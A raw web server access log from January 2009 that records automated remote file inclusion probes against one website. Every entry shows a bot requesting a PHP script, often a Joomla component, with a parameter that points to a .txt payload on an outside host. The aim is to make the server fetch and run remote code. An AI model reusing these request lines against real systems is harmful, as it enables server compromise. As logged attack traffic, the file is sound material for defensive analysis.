213.91.246.64 - - [06/Jan/2009:05:10:05 -0800] "GET /logs/access_081214.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
85.214.51.146 - - [06/Jan/2009:05:10:18 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
85.214.51.146 - - [06/Jan/2009:05:10:18 -0800] "GET /logs/errors.php?error=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
213.91.246.64 - - [06/Jan/2009:05:10:46 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
213.91.246.64 - - [06/Jan/2009:05:10:48 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
213.91.246.64 - - [06/Jan/2009:05:11:09 -0800] "GET /logs/access_081208.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
66.7.216.240 - - [06/Jan/2009:05:12:30 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.web20milliondollarhomepage.com"
66.7.216.240 - - [06/Jan/2009:05:12:30 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.web20milliondollarhomepage.com"
66.7.216.240 - - [06/Jan/2009:05:12:31 -0800] "GET /logs/access_081103.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.web20milliondollarhomepage.com"
66.7.216.240 - - [06/Jan/2009:05:12:49 -0800] "GET /logs/access_081207.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.web20milliondollarhomepage.com"
85.214.51.146 - - [06/Jan/2009:05:12:52 -0800] "GET /logs/access.log/errors.php?error=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:05:13:33 -0800] "GET /logs/access_081224.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:05:13:38 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:05:13:38 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:13:42 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 200 1653 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:13:43 -0800] "GET /?INCLUDE_FOLDER=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:13:46 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 200 1653 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:13:46 -0800] "GET /?INCLUDE_FOLDER=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:05:14:14 -0800] "GET /logs/access_081214.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
66.7.216.240 - - [06/Jan/2009:05:14:18 -0800] "GET /logs/access_081103.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.web20milliondollarhomepage.com"
66.7.216.240 - - [06/Jan/2009:05:14:18 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.web20milliondollarhomepage.com"
66.7.216.240 - - [06/Jan/2009:05:14:18 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.web20milliondollarhomepage.com"
85.214.51.146 - - [06/Jan/2009:05:14:25 -0800] "GET /logs/access.log/errors.php?error=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:14:28 -0800] "GET /logs/access_081118.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:14:28 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:14:28 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
69.94.45.22 - - [06/Jan/2009:05:14:30 -0800] "GET /appserv/main.phphttp://www.topspeedracer.com/mambots/editors-xtd/z6id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
69.94.45.22 - - [06/Jan/2009:05:14:30 -0800] "GET /logs/access_081021.log/appserv/main.phphttp://www.topspeedracer.com/mambots/editors-xtd/z6id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
69.94.45.22 - - [06/Jan/2009:05:14:30 -0800] "GET /logs/appserv/main.phphttp://www.topspeedracer.com/mambots/editors-xtd/z6id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.web20milliondollarhomepage.com"
66.7.216.240 - - [06/Jan/2009:05:14:37 -0800] "GET /logs/access_081207.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:14:46 -0800] "GET /logs/access_081224.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:14:48 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
66.172.9.3 - - [06/Jan/2009:05:14:48 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:14:53 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
200.222.22.156 - - [06/Jan/2009:05:15:30 -0800] "GET /logs/access_081208.log/scanhttp://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:15:41 -0800] "GET /logs/access_081224.log/?INCLUDE_FOLDER=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:15:41 -0800] "GET /?INCLUDE_FOLDER=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:15:41 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 200 1653 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
83.222.23.200 - - [06/Jan/2009:05:16:28 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:16:29 -0800] "GET /?INCLUDE_FOLDER=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
89.218.85.18 - - [06/Jan/2009:05:16:42 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
89.218.85.18 - - [06/Jan/2009:05:16:42 -0800] "GET /logs/access_081207.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
89.218.85.18 - - [06/Jan/2009:05:16:42 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
89.149.209.64 - - [06/Jan/2009:05:16:50 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.web20milliondollarhomepage.com"
89.149.209.64 - - [06/Jan/2009:05:16:50 -0800] "GET /logs/access_081204.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.web20milliondollarhomepage.com"
89.149.209.64 - - [06/Jan/2009:05:16:50 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.web20milliondollarhomepage.com"
41.250.251.52 - - [06/Jan/2009:05:16:52 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.web20milliondollarhomepage.com"
41.250.251.52 - - [06/Jan/2009:05:16:52 -0800] "GET /logs/access_081103.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.web20milliondollarhomepage.com"
41.250.251.52 - - [06/Jan/2009:05:16:52 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:16:58 -0800] "GET /logs/access_081207.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
41.250.251.52 - - [06/Jan/2009:05:17:26 -0800] "GET /logs/access_081207.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:17:29 -0800] "GET /logs/access_081208.log/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:17:29 -0800] "GET /logs/access_081208.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:17:29 -0800] "GET /logs/access_081208.log/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:17:29 -0800] "GET /phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:17:30 -0800] "GET /phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:17:30 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:17:30 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
77.74.198.93 - - [06/Jan/2009:05:17:37 -0800] "GET /logs/access_081204.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.web20milliondollarhomepage.com"
77.74.198.93 - - [06/Jan/2009:05:17:37 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.web20milliondollarhomepage.com"
77.74.198.93 - - [06/Jan/2009:05:17:37 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.web20milliondollarhomepage.com"
72.29.78.145 - - [06/Jan/2009:05:17:42 -0800] "GET /logs/access_081207.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
72.29.78.145 - - [06/Jan/2009:05:17:42 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
72.29.78.145 - - [06/Jan/2009:05:17:42 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
64.22.82.135 - - [06/Jan/2009:05:17:44 -0800] "GET /logs/access.log/errors.php?error=http://www.geilewelt.at/uplimg/maxi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:05:18:53 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:05:18:53 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.web20milliondollarhomepage.com"
64.22.82.135 - - [06/Jan/2009:05:19:09 -0800] "GET /logs/access.log/errors.php?error=http://www.geilewelt.at/uplimg/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
64.22.82.135 - - [06/Jan/2009:05:19:09 -0800] "GET /errors.php?error=http://www.geilewelt.at/uplimg/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
64.22.82.135 - - [06/Jan/2009:05:19:10 -0800] "GET /logs/errors.php?error=http://www.geilewelt.at/uplimg/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
113.30.66.5 - - [06/Jan/2009:05:19:14 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.web20milliondollarhomepage.com"
113.30.66.5 - - [06/Jan/2009:05:19:14 -0800] "GET /logs/access_081103.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.web20milliondollarhomepage.com"
113.30.66.5 - - [06/Jan/2009:05:19:14 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:05:19:17 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:05:19:17 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.web20milliondollarhomepage.com"
64.22.82.135 - - [06/Jan/2009:05:19:21 -0800] "GET /logs/access_081226.log/errors.php?error=http://www.geilewelt.at/uplimg/maxi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
66.172.9.3 - - [06/Jan/2009:05:19:22 -0800] "GET /logs/access_081103.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.web20milliondollarhomepage.com"
66.172.9.3 - - [06/Jan/2009:05:19:22 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.web20milliondollarhomepage.com"
66.172.9.3 - - [06/Jan/2009:05:19:22 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.web20milliondollarhomepage.com"
84.19.190.18 - - [06/Jan/2009:05:19:38 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.web20milliondollarhomepage.com"
84.19.190.18 - - [06/Jan/2009:05:19:38 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.web20milliondollarhomepage.com"
84.19.190.18 - - [06/Jan/2009:05:19:38 -0800] "GET /logs/access_081204.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.web20milliondollarhomepage.com"
91.121.162.129 - - [06/Jan/2009:05:19:49 -0800] "GET /?INCLUDE_FOLDER=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
91.121.162.129 - - [06/Jan/2009:05:19:49 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
91.121.162.129 - - [06/Jan/2009:05:19:49 -0800] "GET /logs/access_081224.log%20%20/?INCLUDE_FOLDER=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:05:20:16 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:05:20:16 -0800] "GET /logs/access_081207.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:05:20:16 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:05:20:24 -0800] "GET /logs/access_081207.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:05:20:25 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
